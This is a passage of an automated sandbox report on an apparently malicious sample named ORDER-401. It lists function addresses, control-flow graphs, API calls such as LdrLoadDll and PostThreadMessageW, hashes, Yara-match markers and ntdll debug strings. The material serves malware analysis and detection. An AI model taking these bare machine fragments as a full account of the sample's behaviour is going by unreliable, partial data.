                                                                    • Instruction ID: 934fb77fa0409c7874f7a2f8fe5ac0ceccbab11669475182c5f65d5113228a07
                                                                    • Opcode Fuzzy Hash: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                                    • Instruction Fuzzy Hash: 1D1108B1D4021C7AEB10ABE19CC1DEF7B7CDF41798F408069FA04B7200D6785E068BA5
                                                                    Function 004143B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                                    • API String ID: 1836367815-2341035416
                                                                    • Opcode ID: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                                    • Instruction ID: 7656ebaa64e068870cd233fd54207e833a46b1e9e0b7fb7ddf8ec8f242163898
                                                                    • Opcode Fuzzy Hash: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                                    • Instruction Fuzzy Hash: CF01D2B2D4021C7AEB10ABE19CC2DEF7B7CDF40798F408069FA04B7240D6785E068BA5
                                                                    Function 00417BDE Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 333 417bde-417bdf 334 417be1-417bf3 333->334 335 417c55-417c67 333->335 339 417c2e-417c38 334->339 336 417c68-417c70 335->336 336->339 340 417c72-417c74 336->340 339->335 341 417c3a-417c3b 339->341 340->336 342 417c76-417c7a 340->342 343 417bca-417bd7 LdrLoadDll 341->343 344 417c3d 341->344 345 417c8c-417c98 342->345 346 417c7c-417c82 342->346 349 417bda-417bdd 343->349 344->335 350 417c99-417cae 345->350 347 417cc0-417cc1 346->347 348 417c84 346->348 348->350 351 417c87 348->351 352 417cb0 350->352 353 417d17-417d2b call 42b9b3 350->353 351->345 355 417cb2-417cbe 352->355 356 417d2e-417d3f 352->356 353->356 355->347
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                                    • Instruction ID: c5951bf59670ed95c8a229a69371e0f0c9dc29fdd02334928d99ddc3ca0f2906
                                                                    • Opcode Fuzzy Hash: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                                    • Instruction Fuzzy Hash: 29219EB67442051FC315CE64EC81BF9B734EB92325F11029AF904CF381E6255D56C7E5
                                                                    Function 00417BF8 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 358 417bf8-417c23 360 417c70 358->360 361 417c25-417c28 358->361 364 417c72-417c74 360->364 365 417c2e-417c38 360->365 362 417be5-417bf3 361->362 363 417c2a 361->363 362->358 368 417bb8-417bc1 363->368 369 417c2c-417c38 363->369 370 417c76-417c7a 364->370 371 417c68-417c6e 364->371 366 417c55-417c67 365->366 367 417c3a-417c3b 365->367 366->371 372 417bca-417bd7 LdrLoadDll 367->372 373 417c3d 367->373 376 417bc3-417bc9 368->376 377 417bda-417bdd 368->377 369->366 369->367 374 417c8c-417c98 370->374 375 417c7c-417c82 370->375 371->360 372->377 373->366 380 417c99-417cae 374->380 378 417cc0-417cc1 375->378 379 417c84 375->379 376->372 379->380 381 417c87 379->381 382 417cb0 380->382 383 417d17-417d2b call 42b9b3 380->383 381->374 385 417cb2-417cbe 382->385 386 417d2e-417d3f 382->386 383->386 385->378
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                                    • Instruction ID: 00ac5599f99533841f8bda13b0be2f1b62a40995406928251777d9fad877b1ce
                                                                    • Opcode Fuzzy Hash: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                                    • Instruction Fuzzy Hash: CD21AB3A70C10A9FCB118E24D844AEAFF74EF96719B2041DAD450CB342E226A98687D8
                                                                    Function 0042CC63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 404 42cc63-42cca1 call 404643 call 42db53 RtlAllocateHeap
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                                    • Instruction ID: 7c74d4e41703ecf2ac74f9d9b4895f51b419b40aa0f09aed774a1cc672b14946
                                                                    • Opcode Fuzzy Hash: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                                    • Instruction Fuzzy Hash: 3DE09AB22042187BCA14EF5AEC41F9B37ACEFC9710F004419FA08A7341D675BA108BB8
                                                                    Function 0042CCA3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                                    • Instruction ID: 17ffdd14cf893de34d185b730fd02e884b2db9c7d9af60b921a6e04f82d44752
                                                                    • Opcode Fuzzy Hash: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                                    • Instruction Fuzzy Hash: C8E06D712002047BC610EE49DC42F9B37ACEFC5714F004419F908A7341D674B9108AB8
                                                                    Function 0042CCE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                                    • Instruction ID: db584931667c167d052b57122e12c945e868705e8a3680be29b3f7ccc7343bef
                                                                    • Opcode Fuzzy Hash: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                                    • Instruction Fuzzy Hash: 49E04F356442147BC610AA5ADC01F9B775CEBC5754F414419FA0CA7241D675791187E4
                                                                    Function 01582C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 424 1582c0a-1582c0f 425 1582c1f-1582c26 LdrInitializeThunk 424->425 426 1582c11-1582c18 424->426
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 97ddbbbf7cbb82cc6fbb0416d13531a697a59c4ecae609498bdc17a41b745120
                                                                    • Instruction ID: 683470368e6edcbc245cf83cdd99651d7252f444e6bf027d9a52abd57f40609c
                                                                    • Opcode Fuzzy Hash: 97ddbbbf7cbb82cc6fbb0416d13531a697a59c4ecae609498bdc17a41b745120
                                                                    • Instruction Fuzzy Hash: C4B09B719015C5D5DF11F764460871B7D4077D1711F19C461D2034A45F477CC1D1E276

                                                                    Non-executed Functions

                                                                    Function 015F8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • This failed because of error %Ix., xrefs: 015F8EF6
                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 015F8E4B
                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 015F8DD3
                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 015F8DB5
                                                                    • a NULL pointer, xrefs: 015F8F90
                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 015F8DC4
                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 015F8D8C
                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 015F8F3F
                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 015F8FEF
                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 015F8E02
                                                                    • *** enter .cxr %p for the context, xrefs: 015F8FBD
                                                                    • *** enter .exr %p for the exception record, xrefs: 015F8FA1
                                                                    • *** then kb to get the faulting stack, xrefs: 015F8FCC
                                                                    • The critical section is owned by thread %p., xrefs: 015F8E69
                                                                    • write to, xrefs: 015F8F56
                                                                    • read from, xrefs: 015F8F5D, 015F8F62
                                                                    • an invalid address, %p, xrefs: 015F8F7F
                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 015F8F26
                                                                    • *** Inpage error in %ws:%s, xrefs: 015F8EC8
                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 015F8F34
                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 015F8DA3
                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 015F8E86
                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 015F8E3F
                                                                    • <unknown>, xrefs: 015F8D2E, 015F8D81, 015F8E00, 015F8E49, 015F8EC7, 015F8F3E
                                                                    • The resource is owned exclusively by thread %p, xrefs: 015F8E24
                                                                    • The resource is owned shared by %d threads, xrefs: 015F8E2E
                                                                    • Go determine why that thread has not released the critical section., xrefs: 015F8E75
                                                                    • The instruction at %p tried to %s , xrefs: 015F8F66
                                                                    • The instruction at %p referenced memory at %p., xrefs: 015F8EE2
                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 015F8F2D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                    • API String ID: 0-108210295
                                                                    • Opcode ID: c26e77e18ed5488f724b42c2eeb2ccdbeedbca893aebf0a94dea836fb5d04c38
                                                                    • Instruction ID: 77b1210ddfec7327f11da73b4e35defbfa46e9b75c3d76405b84a4045eb54ca9
                                                                    • Opcode Fuzzy Hash: c26e77e18ed5488f724b42c2eeb2ccdbeedbca893aebf0a94dea836fb5d04c38
                                                                    • Instruction Fuzzy Hash: 5581EF79A40201BFDB259E598C49E6B7F77FF96B10B45004DF318AF212E3768901CAA2
                                                                    Function 015C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2160512332
                                                                    • Opcode ID: 0e777c1f56488bdce2df5c81879cb27eaa780df8a0f75bd0dc9bbd452aff9d15
                                                                    • Instruction ID: c02af99035705838c35e4ec5d15c6c879d550b8ca71524174639f2f9820823c1
                                                                    • Opcode Fuzzy Hash: 0e777c1f56488bdce2df5c81879cb27eaa780df8a0f75bd0dc9bbd452aff9d15
                                                                    • Instruction Fuzzy Hash: 80928075608342AFE721DF69C880B6BBBE8BB84B54F04491DFA94DF250D770E844CB92
                                                                    Function 01578620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Critical section debug info address, xrefs: 015B541F, 015B552E
                                                                    • Thread identifier, xrefs: 015B553A
                                                                    • Critical section address, xrefs: 015B5425, 015B54BC, 015B5534
                                                                    • double initialized or corrupted critical section, xrefs: 015B5508
                                                                    • Critical section address., xrefs: 015B5502
                                                                    • Invalid debug info address of this critical section, xrefs: 015B54B6
                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015B54E2
                                                                    • Address of the debug info found in the active list., xrefs: 015B54AE, 015B54FA
                                                                    • undeleted critical section in freed memory, xrefs: 015B542B
                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015B540A, 015B5496, 015B5519
                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 015B5543
                                                                    • 8, xrefs: 015B52E3
                                                                    • corrupted critical section, xrefs: 015B54C2
                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015B54CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                    • API String ID: 0-2368682639
                                                                    • Opcode ID: 263d72fe5743ceaaf853c36a799c40a87e546fd2190aafb4c601f656eb34ffa7
                                                                    • Instruction ID: 3b9ea9c8648bf676ae2738564aa8be47b4317073a56d310f41212c8086d934d6
                                                                    • Opcode Fuzzy Hash: 263d72fe5743ceaaf853c36a799c40a87e546fd2190aafb4c601f656eb34ffa7
                                                                    • Instruction Fuzzy Hash: E381ADB1A01359AFEB24CF99CC85BAEBBF5FB49714F104119F504BB290E3B5A940CB90
                                                                    Function 015729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015B2602
                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015B2409
                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015B2498
                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 015B261F
                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015B2412
                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015B25EB
                                                                    • @, xrefs: 015B259B
                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015B2506
                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015B22E4
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015B2624
                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015B24C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                    • API String ID: 0-4009184096
                                                                    • Opcode ID: 4841cd7129e8724191fdeed8fd5b8398c5f94b484b3b9404b9a5a9370f389d03
                                                                    • Instruction ID: 54729408b268a120405555b95b007dfe0373928e5d8fd0380799b0df2f62dd55
                                                                    • Opcode Fuzzy Hash: 4841cd7129e8724191fdeed8fd5b8398c5f94b484b3b9404b9a5a9370f389d03
                                                                    • Instruction Fuzzy Hash: 5B026FB1D002299FDB21DB54CC81BEDB7B8BB54704F4045DAE649AB241EB31AF84CF69
                                                                    Function 015E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                    • API String ID: 0-2515994595
                                                                    • Opcode ID: 84ad9a72d1811b0f733f6dee4e43164362f04e8ee9d8205ad93b9468f222c0cd
                                                                    • Instruction ID: dbd80f90dbc45ef7f71252cc2614591a46ae11c9633db984d3498253a0b572fc
                                                                    • Opcode Fuzzy Hash: 84ad9a72d1811b0f733f6dee4e43164362f04e8ee9d8205ad93b9468f222c0cd
                                                                    • Instruction Fuzzy Hash: F951BF719043129BD32ADF18C948BABBBE8FF99640F14491DA9998F244E770D608C792
                                                                    Function 0155AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-3197712848
                                                                    • Opcode ID: c647a96f38b107b55cb5f69cc47c7b1deb2e43dfff5b0f1d2cf64fc9a2dc084a
                                                                    • Instruction ID: 302ca5994a2c7b18fdc8243f284cc6e9fe7862b1c2a8e250aa4f848c54a0648c
                                                                    • Opcode Fuzzy Hash: c647a96f38b107b55cb5f69cc47c7b1deb2e43dfff5b0f1d2cf64fc9a2dc084a
                                                                    • Instruction Fuzzy Hash: 9A12DF716083429FD365DB28C8A0BAEB7E5BF84704F440A1EFD958F291E774D944CBA2
                                                                    Function 015F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                    • API String ID: 0-1700792311
                                                                    • Opcode ID: a9507dfeeefcf7e9e0e64ebce7d8ab6fc6f80c205e2069b9de75e0e9791faea2
                                                                    • Instruction ID: a6353f760225cefd5967fd9e58900b636a1eb66675a56ef7e0ef6422c84ad2d6
                                                                    • Opcode Fuzzy Hash: a9507dfeeefcf7e9e0e64ebce7d8ab6fc6f80c205e2069b9de75e0e9791faea2
                                                                    • Instruction Fuzzy Hash: D4D1AB36A00686DFDB22DF68C845AADBBF2FF8A610F08805DF6459F292D774D941CB10
                                                                    Function 015C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • AVRF: -*- final list of providers -*- , xrefs: 015C8B8F
                                                                    • HandleTraces, xrefs: 015C8C8F
                                                                    • VerifierDlls, xrefs: 015C8CBD
                                                                    • VerifierFlags, xrefs: 015C8C50
                                                                    • VerifierDebug, xrefs: 015C8CA5
                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 015C8A67
                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 015C8A3D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                    • API String ID: 0-3223716464
                                                                    • Opcode ID: dce5f57175438e2acbe5f07d6cfc2c1c83fae0b8fcf1bd22a2ea5fe6206babd2
                                                                    • Instruction ID: c710c62f526b4703d982744888297c5650d1696f5f347fb8d0ae09c6b8414161
                                                                    • Opcode Fuzzy Hash: dce5f57175438e2acbe5f07d6cfc2c1c83fae0b8fcf1bd22a2ea5fe6206babd2
                                                                    • Instruction Fuzzy Hash: 269122B2645712AFD321DFA8DC80B6A7BE8BB94F14F45485DFA426F240C770AC01CB91
                                                                    Function 0154EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                    • API String ID: 0-1109411897
                                                                    • Opcode ID: 1f3a0f39792d02accfb5a6ff6c606c03939777db1c29ed4159354ed2c3a20dae
                                                                    • Instruction ID: 7f149419ddbd42e272bd29176db8f76d80f39ad3bd1b0c6931f671f0cb7f71c6
                                                                    • Opcode Fuzzy Hash: 1f3a0f39792d02accfb5a6ff6c606c03939777db1c29ed4159354ed2c3a20dae
                                                                    • Instruction Fuzzy Hash: EAA22974A0562A8FDB64DF58CC887ADBBB5BF85304F5442EAD90DAB250DB749E81CF00
                                                                    Function 015763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-792281065
                                                                    • Opcode ID: 36f21419d519315c52816ad91b19114b2dd51503a276574adf30872350c1437e
                                                                    • Instruction ID: 6eb83852f877361fbcb4d63f9463dde39bb292e1cde203273b0acbbbf867f3f6
                                                                    • Opcode Fuzzy Hash: 36f21419d519315c52816ad91b19114b2dd51503a276574adf30872350c1437e
                                                                    • Instruction Fuzzy Hash: 8F910771A007569BEB35DF58ECCABAE7BA2FB81B14F140129D9026F282D7B49801C795
